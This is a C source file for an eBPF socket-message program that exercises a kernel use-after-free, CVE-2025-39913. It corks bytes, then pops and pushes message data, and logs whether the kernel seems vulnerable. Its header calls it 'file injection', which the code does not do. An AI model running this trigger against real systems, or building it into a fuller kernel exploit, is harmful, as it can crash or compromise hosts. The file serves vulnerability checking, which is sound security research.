/*
    File injection via kernel eBPF program
    Author : Byte Reaper
    My platform : https://www.bytrep.com/
    ---------------------------------------------
    If bpf_printk does not appear in debug tracing, try using the bpf_trace_printk function.
    Ex :
        char *log1 = "MESSAGE";
        bpf_trace_printk(log1, sizeof(log1));
*/
#define BPF_NO_GLOBAL_DATA
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

char LICENSE[] SEC("license") = "GPL";

const __u32  pidBPF = 0;
struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 1);
    __type(key, int);
    __type(value, int);
} cork_config_map SEC(".maps");

SEC("sk_msg")
int loadBPF(struct sk_msg_md *msg)
{
    bpf_printk("[+] eBPF program loaded successfully!\n");
   __u32 mainBPF = (bpf_get_current_pid_tgid() >> 32);
    if (pidBPF != 0 && mainBPF != pidBPF)
    {
        return SK_PASS;
    }   
    bpf_printk("[+] Current TGID : %u\n", 
        mainBPF);  
    if (msg->size <= 0 )
    {
        bpf_printk("[-] Message size is zero or negative, Exit...\n");
        return SK_PASS;
    }
    if (msg->local_ip4 == 0)
    {
        bpf_printk("[-] Local IP is zero\n");
        return SK_PASS;
    }
    bpf_printk("[+] Local IP : %d\n", 
        msg->local_ip4);
    bpf_printk("[+] Message family : %d\n", 
        msg->family);
    bpf_printk("[+] Message size : %d\n", 
        msg->size);
    int key = 0;
    __u32 *ptrBytes = bpf_map_lookup_elem(&cork_config_map, &key);
    if (!ptrBytes)
    {
        bpf_printk("[-] Error: cork_config_map not found.\n");
        return SK_PASS; 
    }
    bpf_printk("[+] CORK_BUF_SIZE : %d\n", 
        *ptrBytes);
    __u32 lenB = *ptrBytes;
    bpf_printk("[+] Cork Length from Map: %u\n", 
        lenB);
    bpf_printk("[+] Call bpf_msg_cork_bytes() function...\n");

    int  var1 = bpf_msg_cork_bytes(msg, 
        lenB);
    if (var1 < 0)
    {
        bpf_printk("[-] Error bpf_msg_cork_bytes() (ret = %ld)\n", 
            var1);
        return SK_PASS;
    }
    bpf_printk("[+] bpf_msg_cork_bytes() successful : %ld\n", 
        var1);
    //Attempting to use the data from the message to verify UAF (POP / PUSH).
    int  var3 = bpf_msg_pop_data(msg, 
        0, 
        lenB, 
        0);
    if (var3 < 0)
    {
        bpf_printk("[-] Error bpf_msg_pop_data() (ret = %d)\n", 
            var3);
        return SK_PASS;
    }
    bpf_printk("[+] bpf_msg_pop_data() successful : %d\n", 
        var3);
    bpf_printk("[+] push data msg for check UAF...\n");

    int  var4 = bpf_msg_push_data(msg, 
        0, 
        lenB, 
        0);  
    if (var4 < 0)
    {
        bpf_printk("[-] Error bpf_msg_push_data() (ret = %d)\n", 
            var4);
        return SK_PASS;
    }
    bpf_printk("[+] bpf_msg_push_data() successful : %d\n", 
        var4);
    bpf_printk("[+] Not CVE-2025-39913 Vulnerable (POP / PUSH SUCCESS).\n");
    bpf_printk("[+] eBPF program finished successfully!\n");
    return SK_PASS;
}


